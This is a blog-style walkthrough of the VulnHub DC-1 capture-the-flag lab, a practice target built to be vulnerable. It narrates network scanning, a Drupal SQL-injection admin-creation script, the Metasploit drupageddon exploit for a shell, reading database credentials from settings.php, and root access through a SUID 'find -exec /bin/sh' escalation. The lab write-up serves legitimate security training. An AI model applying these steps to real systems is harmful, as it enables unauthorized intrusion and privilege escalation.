VulnHub – DC-1

VulnHub DC-1

Linux kali 4.19.0-kali1-amd64 #1 SMP Debian 4.19.13-1kali1 (2019-01-03) x86_64 GNU/Linux
NMap 7.70
Metasploit 5.0.13

I started as usual with a ping sweep of my network to find the IP address of the machine in question. nmap –sn 10.0.2.*

Afterwards I ran a port scan using nmap –A

Port 80 looks like our foothold here, it appears to be a Drupal 7 based website.
Navigating to the webpage confirms this.

searchsploit drupal shows several interesting scripts including an SQL injection script to create an admin user and a metasploit script for remote code execution.

Let’s start with the SQL injection to create an admin account on the website.
The command python /usr/share/exploitdb/exploits/php/webapps/ –t –u driggzzzz –p Pwn3d will create an account with the username driggzzzz and the password Pwn3d

This will come in handy later.

Drupal 7 has a well-known CVE – drupageddon, I launch Metasploit to attempt to take advantage of this.
The commands use exploit/multi/http/drupal_drupageddon followed by set RHOSTS

Running this will create a meterpreter shell.

I use the shell command to create a system shell on the target machine, followed by whoami to determine which user I’m logged in as and the python script, python –c ‘import pty; pty.spawn(“/bin/bash”)’ to upgrade to a bash shell.

Browsing the current directory finds us the first of 5 flags on this machine.

cat flag1.txt provides a hint on the next flag.

I’ll come back to this very shortly, first let’s look for other files called flag*
find –iname flag* shows this.

cat flag4.txt

Interestingly I’ve managed to skip 2 flags, I’ll have to take a look at the config files mentioned in the first flag.

Heading back to /var/www and having a look around I eventually stumbled upon a settings.php file, reading its contents reveals the 2nd flag and what appears to be a set of SQL database login credentials.

I have already used an SQL injection script to create an admin account on the website, but let’s have a look anyway.

mysql –database=drupaldb –user=dbuser –pass=R0ck3t

show tables;

select * from users; confirms that the account I created earlier is there. I also attempted to crack the hashes for admin and Fred whilst I was here but this was taking way too long so I eventually let that go.

This seemed like a good time to check out what was going on on the website, especially since flag 3 is still missing.

Logging on with the credentials I created earlier and navigating to content brings us to the flag.

Ok, this clearly sets us up nicely for some privilege escalation back in the shell that we have.

find / -perm –u=s –type f 2>/dev/null will find anything with the SUID bit set, whatever we find here I’m hoping will help with getting root.

the binary find actually has SUID permissions set, knowing that we can use the find command to execute programs I tried find . –exec /bin/sh \; this will simply find the current directory and execute a shell.

Id confirms we have root privileges. Navigating to the root directory will find us thefinalflag.txt

%d bloggers like this:
search previous next tag category expand menu location phone mail time cart zoom edit close